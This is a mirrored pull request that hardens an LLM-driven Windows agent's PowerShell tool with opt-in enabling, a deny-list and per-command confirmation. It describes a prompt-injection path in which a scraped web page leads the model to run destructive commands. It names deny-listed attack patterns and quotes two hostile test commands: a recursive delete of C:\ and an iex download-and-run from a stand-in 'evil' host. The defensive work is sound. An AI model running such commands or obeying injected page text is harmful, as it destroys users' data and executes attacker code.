[PR #883] Make Windows-Use agent Shell Tool safe-by-default (opt-in + deny-list + confirm) #13290

Open
opened 2026-06-21 05:46:07 -05:00 by GiteaMirror · 0 comments
Owner

📋 Pull Request Information

Original PR: https://github.com/Shubhamsaboo/awesome-llm-apps/pull/883
Author: @Avi-Bendetsky
Created: 6/13/2026
Status: 🔄 Open

Base: mainHead: harden/windows-use-shell


📝 Commits (1)

  • ed7b05d harden(windows-use): make LLM Shell Tool safe-by-default

📊 Changes

6 files changed (+498 additions, -5 deletions)

View changed files

📝 advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent/.env-example (+16 -1)
📝 advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent/README.md (+33 -1)
advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent/tests/test_shell_policy.py (+176 -0)
📝 advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent/windows_use/agent/tools/service.py (+22 -1)
📝 advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent/windows_use/desktop/__init__.py (+11 -2)
advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent/windows_use/desktop/shell_policy.py (+240 -0)

📄 Description

Summary

Makes the Shell Tool in advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent safe-by-default.

Today shell_tool runs arbitrary, LLM-generated PowerShell on the host with no gate, and scrape_tool pulls arbitrary web pages into the model's context. Together that's a realistic prompt-injection → local RCE path: a malicious page the agent reads can talk the model into running destructive PowerShell as the current user. This is inherent to the project's purpose (driving Windows via PowerShell), so the goal here is containment, not removal.

Changes (scoped entirely to this one example; nothing else touched)

  • New windows_use/desktop/shell_policy.py (pure-stdlib, no Windows imports → unit-testable anywhere):
    • is_shell_enabled() — Shell Tool is off unless WINDOWS_USE_ENABLE_SHELL=1.
    • screen_command() — deny-list for destructive/persistence/exfil patterns (disk format, recursive delete, vssadmin delete shadows, iex+web-download droppers, -EncodedCommand, Defender tampering, schtasks/New-Service persistence, account/privilege changes…).
    • confirm_command() — interactive y/N per command (default No); WINDOWS_USE_SHELL_AUTO_APPROVE=1 skips the prompt for unattended runs (deny-list still applies); EOF/closed stdin ⇒ No (fails closed).
    • audit_log() — optional WINDOWS_USE_SHELL_LOG=<path>.
    • __main__ self-test block.
  • shell_tool routed through the policy; when disabled/blocked/declined it returns a clear message so the agent degrades gracefully to the GUI tools (Launch/Click/Type/Shortcut) instead of hard-failing.
  • execute_command bug fix: it built the argv as ['powershell','-Command'] + command.split(), which mangles any quoted/multi-token command (e.g. paths with spaces). Now passes the command as a single -Command argument and adds -NoProfile -NonInteractive. Trusted internal callers (launch_app, get_apps_from_start_menu) are intentionally left ungated so app-launching keeps working with no prompts.
  • .env-example documents the three switches; README gains a "Security / Safe Mode" section.
  • tests/test_shell_policy.py — loads the policy by file path (no GUI deps); 65 tests.

Testing

  • python windows_use/desktop/shell_policy.py self-test → 16 blocked / 5 allowed.
  • pytest tests/test_shell_policy.py65 passed (Python 3.13).
  • Manual proofs: disabled-by-default; Remove-Item C:\ -Recurse -Force and iex (iwr http://evil/x.ps1) blocked while Get-Process passes; execute_command now passes the command as a single argv element.

Note

A deny-list can't be exhaustive — PowerShell has too many ways to express the same action. The real guarantees are off-by-default + per-command confirmation; the deny-list is defense-in-depth for the auto-approve case. README states this plainly and recommends running in a VM/throwaway account.

Backward-compatible: default behavior changes from "shell always runs" to "shell off unless opted in," which is the intended safety improvement. Existing GUI-only usage is unaffected.


🔄 This issue represents a GitHub Pull Request. It cannot be merged through Gitea due to API limitations.

## 📋 Pull Request Information **Original PR:** https://github.com/Shubhamsaboo/awesome-llm-apps/pull/883 **Author:** [@Avi-Bendetsky](https://github.com/Avi-Bendetsky) **Created:** 6/13/2026 **Status:** 🔄 Open **Base:** `main` ← **Head:** `harden/windows-use-shell` --- ### 📝 Commits (1) - [`ed7b05d`](https://github.com/Shubhamsaboo/awesome-llm-apps/commit/ed7b05d0d7b94013680c17c3d0fb1e729f3b4155) harden(windows-use): make LLM Shell Tool safe-by-default ### 📊 Changes **6 files changed** (+498 additions, -5 deletions) <details> <summary>View changed files</summary> 📝 `advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent/.env-example` (+16 -1) 📝 `advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent/README.md` (+33 -1) ➕ `advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent/tests/test_shell_policy.py` (+176 -0) 📝 `advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent/windows_use/agent/tools/service.py` (+22 -1) 📝 `advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent/windows_use/desktop/__init__.py` (+11 -2) ➕ `advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent/windows_use/desktop/shell_policy.py` (+240 -0) </details> ### 📄 Description ## Summary Makes the **Shell Tool** in `advanced_ai_agents/single_agent_apps/windows_use_autonomous_agent` **safe-by-default**. Today `shell_tool` runs arbitrary, LLM-generated PowerShell on the host with no gate, and `scrape_tool` pulls arbitrary web pages into the model's context. Together that's a realistic **prompt-injection → local RCE** path: a malicious page the agent reads can talk the model into running destructive PowerShell as the current user. This is inherent to the project's purpose (driving Windows via PowerShell), so the goal here is containment, not removal. ## Changes (scoped entirely to this one example; nothing else touched) - **New `windows_use/desktop/shell_policy.py`** (pure-stdlib, no Windows imports → unit-testable anywhere): - `is_shell_enabled()` — Shell Tool is **off unless `WINDOWS_USE_ENABLE_SHELL=1`**. - `screen_command()` — deny-list for destructive/persistence/exfil patterns (disk format, recursive delete, `vssadmin delete shadows`, `iex`+web-download droppers, `-EncodedCommand`, Defender tampering, `schtasks`/`New-Service` persistence, account/privilege changes…). - `confirm_command()` — interactive **y/N per command (default No)**; `WINDOWS_USE_SHELL_AUTO_APPROVE=1` skips the prompt for unattended runs (deny-list still applies); EOF/closed stdin ⇒ No (fails closed). - `audit_log()` — optional `WINDOWS_USE_SHELL_LOG=<path>`. - `__main__` self-test block. - **`shell_tool`** routed through the policy; when disabled/blocked/declined it returns a clear message so the agent **degrades gracefully to the GUI tools** (Launch/Click/Type/Shortcut) instead of hard-failing. - **`execute_command`** bug fix: it built the argv as `['powershell','-Command'] + command.split()`, which **mangles any quoted/multi-token command** (e.g. paths with spaces). Now passes the command as a single `-Command` argument and adds `-NoProfile -NonInteractive`. Trusted internal callers (`launch_app`, `get_apps_from_start_menu`) are intentionally left ungated so app-launching keeps working with no prompts. - **`.env-example`** documents the three switches; **README** gains a "Security / Safe Mode" section. - **`tests/test_shell_policy.py`** — loads the policy by file path (no GUI deps); **65 tests**. ## Testing - `python windows_use/desktop/shell_policy.py` self-test → 16 blocked / 5 allowed. - `pytest tests/test_shell_policy.py` → **65 passed** (Python 3.13). - Manual proofs: disabled-by-default; `Remove-Item C:\ -Recurse -Force` and `iex (iwr http://evil/x.ps1)` blocked while `Get-Process` passes; `execute_command` now passes the command as a single argv element. ## Note A deny-list can't be exhaustive — PowerShell has too many ways to express the same action. The real guarantees are **off-by-default** + **per-command confirmation**; the deny-list is defense-in-depth for the auto-approve case. README states this plainly and recommends running in a VM/throwaway account. Backward-compatible: default behavior changes from "shell always runs" to "shell off unless opted in," which is the intended safety improvement. Existing GUI-only usage is unaffected. --- <sub>🔄 This issue represents a GitHub Pull Request. It cannot be merged through Gitea due to API limitations.</sub>
GiteaMirror added the pull-request label 2026-06-21 05:46:07 -05:00
Sign in to join this conversation.
1 Participants
Notifications
Due Date
No due date set.
Dependencies

No dependencies set.

Reference: github-starred/awesome-llm-apps#13290